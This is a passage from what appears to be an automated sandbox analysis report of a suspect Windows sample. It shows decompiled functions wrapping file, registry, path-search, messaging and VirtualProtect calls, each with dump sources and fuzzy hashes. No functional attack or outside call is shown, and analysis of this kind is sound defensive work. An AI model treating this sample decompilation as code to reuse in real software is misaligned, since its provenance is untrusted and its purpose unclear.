                                                              0x004022f1
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileMove
                                                              • String ID:
                                                              • API String ID: 3562171763-0
                                                              • Opcode ID: a58878bd09eabd37c2a753385f93d12ee34b17dd18e98857f8ebabd4f9d4e486
                                                              • Instruction ID: be669950fb77a2d656db840ba494943e65029fea8fad8f9acd4f4e8736b9b328
                                                              • Opcode Fuzzy Hash: a58878bd09eabd37c2a753385f93d12ee34b17dd18e98857f8ebabd4f9d4e486
                                                              • Instruction Fuzzy Hash: 62F0BB31A08120E7CB11BBB55F4DE5E2154DF83364F24023FF011B11D1D9BDC95255AE
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 33%
                                                              			E00402891(intOrPtr __edx, void* __eflags) {
                                                              				long _t8;
                                                              				long _t10;
                                                              				LONG* _t12;
                                                              				void* _t14;
                                                              				intOrPtr _t15;
                                                              				void* _t16;
                                                              				void* _t19;
                                                              
                                                              				_t15 = __edx;
                                                              				_pop(ds);
                                                              				if(__eflags != 0) {
                                                              					_t8 = E00402D84(2);
                                                              					_pop(_t14);
                                                              					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                                              					_t10 = SetFilePointer(E004065C8(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                                              					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                                              						_push(_t10);
                                                              						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                              						E004065AF();
                                                              					}
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t19 - 4));
                                                              				return 0;
                                                              			}










                                                              0x00402891
                                                              0x00402891
                                                              0x00402892
                                                              0x0040289a
                                                              0x0040289f
                                                              0x004028a0
                                                              0x004028af
                                                              0x004028b8
                                                              0x004028be
                                                              0x00402ba1
                                                              0x00402ba4
                                                              0x00402ba4
                                                              0x004028b8
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                                • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FilePointerwsprintf
                                                              • String ID:
                                                              • API String ID: 327478801-0
                                                              • Opcode ID: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                              • Instruction ID: 25e331afd2345d3cd5f25c8269d0b77429ab830f022e4fbb565c81036e55150a
                                                              • Opcode Fuzzy Hash: c5c8d79c1340bb369312f6a5c9378fe315f9bf95113b40b2c793821570691f3d
                                                              • Instruction Fuzzy Hash: 16E09271904104BFDB01EBA5BE499AEB7B8EF44319B10483BF102F00D0DA794D119B2D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004023B2(int __eax, WCHAR* __ebx) {
                                                              				WCHAR* _t11;
                                                              				WCHAR* _t13;
                                                              				void* _t17;
                                                              				int _t21;
                                                              
                                                              				_t11 = __ebx;
                                                              				_t5 = __eax;
                                                              				_t13 = 0;
                                                              				if(__eax != __ebx) {
                                                              					__eax = E00402DA6(__ebx);
                                                              				}
                                                              				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                              					_t13 = E00402DA6(0x11);
                                                              				}
                                                              				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                              					_t11 = E00402DA6(0x22);
                                                              				}
                                                              				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                              				_t21 = _t5;
                                                              				if(_t21 == 0) {
                                                              					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t17 - 4));
                                                              				return 0;
                                                              			}







                                                              0x004023b2
                                                              0x004023b2
                                                              0x004023b4
                                                              0x004023b8
                                                              0x004023bb
                                                              0x004023c0
                                                              0x004023c5
                                                              0x004023ce
                                                              0x004023ce
                                                              0x004023d3
                                                              0x004023dc
                                                              0x004023dc
                                                              0x004023e9
                                                              0x004015b4
                                                              0x004015b6
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringWrite
                                                              • String ID:
                                                              • API String ID: 390214022-0
                                                              • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                              • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                              • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                              • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406503(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                              				void* _t7;
                                                              				long _t8;
                                                              				void* _t9;
                                                              
                                                              				_t7 = E00406454(_a4,  &_a12);
                                                              				if(_t7 != 0) {
                                                              					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                              					return _t8;
                                                              				}
                                                              				_t9 = 6;
                                                              				return _t9;
                                                              			}






                                                              0x0040650d
                                                              0x00406516
                                                              0x0040652c
                                                              0x00000000
                                                              0x0040652c
                                                              0x0040651a
                                                              0x00000000

                                                              APIs
                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 0040652C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                              • Instruction ID: 390987c888b9fe28ccc3a202ccefe0e129b8fdbaba7b34d45eb5723cdb444700
                                                              • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                              • Instruction Fuzzy Hash: C1E0ECB2010109BEEF099F90EC0ADBB372DEB04704F41492EF907E4091E6B5AE70AA34
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00401735() {
                                                              				long _t5;
                                                              				WCHAR* _t8;
                                                              				WCHAR* _t11;
                                                              				void* _t14;
                                                              				long _t17;
                                                              
                                                              				_t5 = SearchPathW(_t8, E00402DA6(0xffffffff), _t8, 0x400, _t11, _t14 + 8); // executed
                                                              				_t17 = _t5;
                                                              				if(_t17 == 0) {
                                                              					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                              					 *_t11 = _t8;
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t14 - 4));
                                                              				return 0;
                                                              			}








                                                              0x00401749
                                                              0x0040174f
                                                              0x00401751
                                                              0x004028fc
                                                              0x00402903
                                                              0x00402903
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PathSearch
                                                              • String ID:
                                                              • API String ID: 2203818243-0
                                                              • Opcode ID: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
                                                              • Instruction ID: 6450ab0b933f3cc6d02a21ebc76c27f69b4627690f11a38bac6dda038a0a621d
                                                              • Opcode Fuzzy Hash: 2c089d9499bcaed07f509e48e4c3e1e82a1ca6aec248580a4a456b36f8037f69
                                                              • Instruction Fuzzy Hash: 87E08072304105EBE740DB64DE49FAE7368DF40358F204637E511E51D1E6B49945972D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040620A(void* _a4, void* _a8, long _a12) {
                                                              				int _t7;
                                                              				long _t11;
                                                              
                                                              				_t11 = _a12;
                                                              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                              					return 0;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}





                                                              0x0040620e
                                                              0x0040621e
                                                              0x00406226
                                                              0x00000000
                                                              0x0040622d
                                                              0x00000000
                                                              0x0040622f

                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040D54F,0040CEF0,00403579,0040CEF0,0040D54F,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                              • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004061DB(void* _a4, void* _a8, long _a12) {
                                                              				int _t7;
                                                              				long _t11;
                                                              
                                                              				_t11 = _a12;
                                                              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                              					return 0;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}





                                                              0x004061df
                                                              0x004061ef
                                                              0x004061f7
                                                              0x00000000
                                                              0x004061fe
                                                              0x00000000
                                                              0x00406200

                                                              APIs
                                                              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                              • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                              • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                              
                                                              				 *0x6f675048 = _a4;
                                                              				if(_a8 == 1) {
                                                              					VirtualProtect(0x6f67505c, 4, 0x40, 0x6f67504c); // executed
                                                              					 *0x6f67505c = 0xc2;
                                                              					 *0x6f67504c = 0;
                                                              					 *0x6f675054 = 0;
                                                              					 *0x6f675068 = 0;
                                                              					 *0x6f675058 = 0;
                                                              					 *0x6f675050 = 0;
                                                              					 *0x6f675060 = 0;
                                                              					 *0x6f67505e = 0;
                                                              				}
                                                              				return 1;
                                                              			}



                                                              0x6f672a88
                                                              0x6f672a8d
                                                              0x6f672a9d
                                                              0x6f672aa5
                                                              0x6f672aac
                                                              0x6f672ab1
                                                              0x6f672ab6
                                                              0x6f672abb
                                                              0x6f672ac0
                                                              0x6f672ac5
                                                              0x6f672aca
                                                              0x6f672aca
                                                              0x6f672ad2

                                                              APIs
                                                              • VirtualProtect.KERNELBASE(6F67505C,00000004,00000040,6F67504C), ref: 6F672A9D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62505218441.000000006F671000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F670000, based on PE: true
                                                              • Associated: 00000001.00000002.62505168749.000000006F670000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505286401.000000006F674000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.62505338915.000000006F676000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6f670000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: a5ed47f251add276fb267b2979e4c8b7e836a79c8451aca5b373f25db5cd5014
                                                              • Instruction ID: 54e299e0234fce13e20a8dff3f90a56437e272807110287eae290720dba52d87
                                                              • Opcode Fuzzy Hash: a5ed47f251add276fb267b2979e4c8b7e836a79c8451aca5b373f25db5cd5014
                                                              • Instruction Fuzzy Hash: 50F0AEB0904BA0DEDB68CF3E8444B093BE0BB1B324B1445AAE188D6240E77478A4CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004064D5(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                              				void* _t7;
                                                              				long _t8;
                                                              				void* _t9;
                                                              
                                                              				_t7 = E00406454(_a4,  &_a12);
                                                              				if(_t7 != 0) {
                                                              					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                              					return _t8;
                                                              				}
                                                              				_t9 = 6;
                                                              				return _t9;
                                                              			}






                                                              0x004064df
                                                              0x004064e6
                                                              0x004064f9
                                                              0x00000000
                                                              0x004064f9
                                                              0x004064ea
                                                              0x00000000

                                                              APIs
                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406563,?,00000000,?,?,Call,?), ref: 004064F9
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                              • Instruction ID: 5036765eb4ab6e58186d81024f5778724aa2024cd81e2e1d5ca813995cf5404a
                                                              • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                              • Instruction Fuzzy Hash: BAD0123210020DBBDF115F90AD01FAB375DAB08310F018426FE06A4092D775D534A728
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004015A3() {
                                                              				int _t5;
                                                              				void* _t11;
                                                              				int _t14;
                                                              
                                                              				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                              				_t14 = _t5;
                                                              				if(_t14 == 0) {
                                                              					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                              				}
                                                              				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t11 - 4));
                                                              				return 0;
                                                              			}






                                                              0x004015ae
                                                              0x004015b4
                                                              0x004015b6
                                                              0x0040292e
                                                              0x0040292e
                                                              0x00402c2d
                                                              0x00402c39

                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
                                                              • Instruction ID: 77b6755767f32433cbba579d7de441064f90f02de732d0e129c6c43bd553ff67
                                                              • Opcode Fuzzy Hash: ecb26fcfbddf9edcaca94c07cf32aba9b51da7ecc0cd49f518a3cca194f28fd5
                                                              • Instruction Fuzzy Hash: F6D0C772B08100DBDB11DBA8AA08B8D73A0AB00328B208537D001F21D0E6B8C8469A2E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00404610(int _a4) {
                                                              				struct HWND__* _t2;
                                                              				long _t3;
                                                              
                                                              				_t2 =  *0x429238;
                                                              				if(_t2 != 0) {
                                                              					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                              					return _t3;
                                                              				}
                                                              				return _t2;
                                                              			}





                                                              0x00404610
                                                              0x00404617
                                                              0x00404622
                                                              0x00000000
                                                              0x00404622
                                                              0x00404628

                                                              APIs
                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.62476622209.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.62476602151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476669365.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476694126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476810062.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476831650.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476858457.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476897766.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62476926851.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.62477011869.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                              • Instruction ID: 1d0f09303225af8c469e983b8f6ba21d59f3f36861eec243a4bc5be8392dea83
                                                              • Opcode Fuzzy Hash: 8557fc69485774ba4641c6a2d2b4437b1a5152abf7221d5f63999a85994ee7b6
                                                              • Instruction Fuzzy Hash: 9EC09B71741700FBDE209B509F45F077794A754701F154979B741F60E0D775D410D62D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

